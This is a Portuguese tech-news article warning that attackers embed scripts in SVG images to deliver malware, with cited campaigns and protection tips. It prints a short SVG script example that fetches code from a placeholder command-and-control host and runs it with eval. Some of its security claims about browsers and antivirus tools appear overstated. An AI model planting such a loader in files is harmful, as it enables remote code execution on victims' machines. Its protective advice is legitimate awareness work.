terça-feira, 14 outubro, 2025
Google search engine
InícioTecnologiaSegurança DigitalGolpe que antivírus não vê: hackers usam imagens SVG para esconder malwares

Golpe que antivírus não vê: hackers usam imagens SVG para esconder malwares

O golpe que antivírus não vê hackers usam imagens SVG para esconder malwares está se espalhando rapidamente. Arquivos vetoriais, aparentemente inofensivos, estão sendo usados para transportar códigos maliciosos que escapam da detecção de segurança. Veja como esse ataque funciona, por que é tão eficaz e quais são as melhores práticas para se proteger.

O golpe que antivírus não vê hackers usam imagens SVG para esconder malwares está se tornando uma ameaça crescente no mundo digital. Além disso, pesquisadores da Kaspersky e da Check Point identificaram uma nova onda de ataques que utiliza arquivos SVG (Scalable Vector Graphics) como veículos para distribuir malware.

Principalmente, o SVG é um formato de imagem vetorial amplamente aceito em navegadores, redes sociais e plataformas de comunicação. Dessa forma, ele é considerado seguro e raramente escaneado por antivírus.

Além disso, hackers estão aproveitando essa brecha para embutir scripts maliciosos diretamente no código do arquivo. Assim, ao abrir a imagem em um navegador ou editor, o código é executado automaticamente, instalando spyware, ransomware ou trojans.

Consequentemente, esse tipo de ataque é especialmente perigoso porque:

  • Parece uma imagem comum
  • Não gera alerta de segurança
  • Pode se propagar por e-mail, WhatsApp e redes sociais

Portanto, o golpe que antivírus não vê hackers usam imagens SVG para esconder malwares é um exemplo de como os cibercriminosos exploram confiança e falhas técnicas.

Como os hackers usam SVG para esconder código malicioso?

O golpe que antivírus não vê hackers usam imagens SVG para esconder malwares funciona porque o SVG é, na verdade, um arquivo de texto com código XML. Além disso, ele pode conter elementos como <script>, <iframe> e chamadas a URLs externas — recursos que os navegadores interpretam como parte da renderização da imagem.

Principalmente, os hackers inserem linhas de código malicioso dentro desses elementos, como:

<script type="text/javascript">
  fetch('https://dominio-malicioso.com/c2')
    .then(r => r.text())
    .then(eval);
</script>


Dessa forma, ao abrir o arquivo SVG, o navegador executa o script, que pode:
  • Baixar e instalar malware
  • Roubar cookies de navegação
  • Redirecionar para sites de phishing
  • Coletar dados sensíveis do usuário

Além disso, como o arquivo tem extensão .svg, ele não é bloqueado por filtros de e-mail nem analisado em profundidade por antivírus tradicionais.

Por que o SVG é invisível para a maioria dos antivírus?

O golpe que antivírus não vê hackers usam imagens SVG para esconder malwares tem sucesso porque os sistemas de segurança tratam o SVG como um arquivo de imagem, não como um documento executável.

Principalmente, os antivírus convencionais:

  • Não escaneiam o conteúdo interno de arquivos vetoriais
  • Não analisam scripts embutidos em SVG
  • Confiam na extensão do arquivo para classificar o risco

Dessa forma, mesmo que o código malicioso esteja visível em um editor de texto, ele passa despercebido pelos mecanismos de detecção.

Além disso, muitas plataformas online, como WhatsApp Web, Telegram e Google Drive, permitem o envio de SVGs sem restrições. Assim, o ataque pode se espalhar rapidamente entre contatos.

Portanto, o golpe que antivírus não vê hackers usam imagens SVG para esconder malwares é um ataque de engenharia social aprimorado por falhas técnicas.

Casos reais de ataques com SVG malicioso

O golpe que antivírus não vê hackers usam imagens SVG para esconder malwares já foi usado em campanhas reais de cibercrime. Além disso, relatórios da Trend Micro e da Sophos revelam casos recentes:

1. Campanha de phishing corporativo (2025)

  • Hackers enviaram e-mails com faturas falsas em formato SVG
  • Ao abrir, o script redirecionava para um site de login falso
  • Milhares de credenciais de acesso foram roubadas

2. Infecção por spyware via WhatsApp

  • Um SVG com o nome “comprovante_pagamento.svg” foi compartilhado em grupos de trabalho
  • Ao visualizar no navegador, o dispositivo foi infectado com um spyware que rastreava mensagens

3. Ataque a jornalistas

  • Imagens de “documentos vazados” em SVG continham scripts que instalavam backdoors
  • Dados sensíveis foram exfiltrados por meses sem detecção

Principalmente, todos os casos tinham um ponto em comum: a vítima acreditava estar vendo uma imagem inofensiva.

Como se proteger contra o golpe com SVG

O golpe que antivírus não vê hackers usam imagens SVG para software malicioso exige atenção redobrada. Além disso, especialistas recomendam as seguintes medidas:

1. Evite abrir SVGs de fontes desconhecidas

  • Trate arquivos SVG como executáveis, não como imagens
  • Desconfie de anexos com extensão .svg em e-mails

2. Use navegadores com bloqueio de scripts em SVG

  • Navegadores como Firefox e Brave já bloqueiam scripts em SVG por padrão
  • No Chrome, é possível usar extensões como NoScript ou uMatrix

3. Atualize seu antivírus para soluções avançadas

  • Soluções como Kaspersky, Bitdefender e ESET já incluem varredura de SVG
  • Prefira antivírus com detecção comportamental e sandbox

4. Converta SVGs em PNG antes de abrir

  • Use ferramentas online para converter o arquivo vetorial em imagem estática
  • Assim, qualquer código malicioso é removido

5. Desative a execução de scripts em SVG no sistema

  • Em ambientes corporativos, bloqueie o uso de SVGs com scripts via políticas de grupo

Portanto, prevenção e conscientização são as melhores defesas.

Comparativo: Segurança de Formatos de Imagem

🖼️ Formato Contém Scripts? Escaneado por Antivírus? Risco de Malware
SVG Sim Raramente Alto
PNG Não Sim Baixo
JPG Não Sim Baixo
GIF Não Sim Baixo

A evolução da segurança digital está no GexNews

Para quem quer se proteger contra golpes, malware e ameaças digitais, o GexNews é uma referência confiável. O site traz análises exclusivas, dicas práticas e cobertura em tempo real sobre os riscos e soluções da cibersegurança.

Acesse já: gexnews.com.br

Conclusão: golpe que antivírus não vê hackers usam imagens SVG para esconder software malicioso

O golpe que antivírus não vê hackers usam imagens SVG para esconder malwares é um alerta para todos os usuários de internet. Além disso, ele mostra que até formatos aparentemente seguros podem ser armas em mãos erradas.

Portanto, nunca abra arquivos de fontes desconhecidas, mantenha seu antivírus atualizado e trate o SVG com a mesma desconfiança que um executável.

Se este conteúdo te alertou, compartilhe com alguém que recebe muitos arquivos por e-mail ou WhatsApp.

Cleber Xerem
Cleber Xeremhttps://grupoexperts.com.br/
Formado no colégio Elpídio Evaristo dos santos em 1982, formação em técnico de eletrônica, cursei a faculdade de rede de computadores até o 4° período na instituição da Estácio de Sá, atuei 35 anos na área de telecomunicações, especialista em transmissão e tecnologia.
ARTIGOS RELACIONADOS

DEIXE UMA RESPOSTA

Por favor digite seu comentário!
Por favor, digite seu nome aqui

- PUBLICIDADE -spot_img

Mais Populares

Comentários Recentes